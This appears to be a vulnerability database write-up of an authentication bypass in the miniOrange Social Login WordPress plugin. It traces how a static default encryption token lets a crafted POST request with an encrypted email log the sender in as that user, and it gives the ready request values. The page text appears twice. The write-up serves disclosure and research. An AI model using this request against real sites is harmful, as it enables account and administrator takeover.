Social Login and Register by miniOrange WordPess plugin Authentication Bypass
LANAVDB ID: 2326f41f-a39f-4fde-8627-9d29fff91443
The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the website.
Let’s check the plugin
The mo_openid_login_validate() function includes the following request handling:
if ( isset( $_REQUEST['option'] ) and strpos( sanitize_text_field( $_REQUEST['option'] ), 'moopenid' ) !== false ) {
mo_openid_process_social_login();
}
The mo_openid_process_social_login() function includes the following code for receiving the email from the request:
We can see from the code that we need the mo_openid_customer_token option value to decrypt, because the data is encrypted with this passphrase. Since there is no other protection in the code, this means that if we have a passphrase, we can specify encrypted data in the request, which the plugin then decrypts and sets the email.
The email is passed to the mo_openid_process_user_details( $appuserdetails, $appname ) function, where the user id is queried with the following code:
$existing_email_user_id = $wpdb->get_var( $wpdb->prepare( "SELECT ID FROM $wpdb->users where user_email = %s", $user_email ) );
then calls mo_openid_login_user(), passed the user, which finally logs the user in.
So we need the mo_openid_customer_token option value. It decrypts the email with this value, then defines the user, and then logs the user in. The miniorange_openid_sso_settings class constructor has the following code that defines the default value statically:
POST /vdb/miniorange-login-openid/ HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded
option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D
We use these values: option: moopenid email: uzmpvjPBmwEO3tFXq0vlJg== (which is [email protected] encrypted and encoded) appName: rlHeqZw2vrPzOiWWfCParA== (which is the wordpress encrypted and encoded)
The exploit script
I created a Python script that returns the WordPress logged_in and auth cookie:
Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.
Social Login and Register by miniOrange WordPess plugin Authentication Bypass
LANAVDB ID: 2326f41f-a39f-4fde-8627-9d29fff91443
The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the website.
Let’s check the plugin
The
mo_openid_login_validate()function includes the following request handling:The
mo_openid_process_social_login()function includes the following code for receiving the email from the request:The
mo_openid_decrypt_sanitize( $param )function includes the following decryption:The
decrypt_data( $data, $key )function includes the following decryption with openssl:We can see from the code that we need the
mo_openid_customer_tokenoption value to decrypt, because the data is encrypted with this passphrase. Since there is no other protection in the code, this means that if we have a passphrase, we can specify encrypted data in the request, which the plugin then decrypts and sets the email.The email is passed to the
mo_openid_process_user_details( $appuserdetails, $appname )function, where the user id is queried with the following code:then calls
mo_openid_login_user(), passed the user, which finally logs the user in.So we need the
mo_openid_customer_tokenoption value. It decrypts the email with this value, then defines the user, and then logs the user in.The
miniorange_openid_sso_settingsclass constructor has the following code that defines the default value statically:So if no user-specific value is set, this static value will be used by the plugin.
Let’s see how we can encrypt data
I created a Python script for the exploit that encrypts and encodes the data:
How to use:
Let’s execute the script:
By encrypting and encoding the data
[email protected], which is the email, we get the following value:uzmpvjPBmwEO3tFXq0vlJg==.By encrypting and encoding the data
wordpress, which is the appName, we get the following value:rlHeqZw2vrPzOiWWfCParA==.Let’s see how we can exploit this vulnerability
We only need to send a POST request to exploit this vulnerability.
The HTTP request to the https://lana.solutions/vdb/miniorange-login-openid/ which is a test WordPress website:
We use these values:
option:moopenidemail:uzmpvjPBmwEO3tFXq0vlJg==(which is[email protected]encrypted and encoded)appName:rlHeqZw2vrPzOiWWfCParA==(which is thewordpressencrypted and encoded)The exploit script
I created a Python script that returns the WordPress logged_in and auth cookie:
Source: miniorange_login_openid_plugin_vdb_get_exploit_cookie.py
How to use:
We get something like this:
Then all we have to do is set the cookie using the browser’s Developer Tools on the website, which in our case is https://lana.solutions/vdb/miniorange-login-openid/
Try it
Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.
Website: https://lana.solutions/vdb/miniorange-login-openid/
References
Attributes
Classification
Researcher
Tags
authentication bypass exploit python wordpress pluginSupport Us?
We would truly appreciate it if you bought us a bunny (food for a snow leopard).
Let's discuss
Hey, you’re reading a publication about social login. Maybe you’re interested in our secure Lana Login with Telegram Passport plugin?
Buy it ($9) from CodeCanyon.net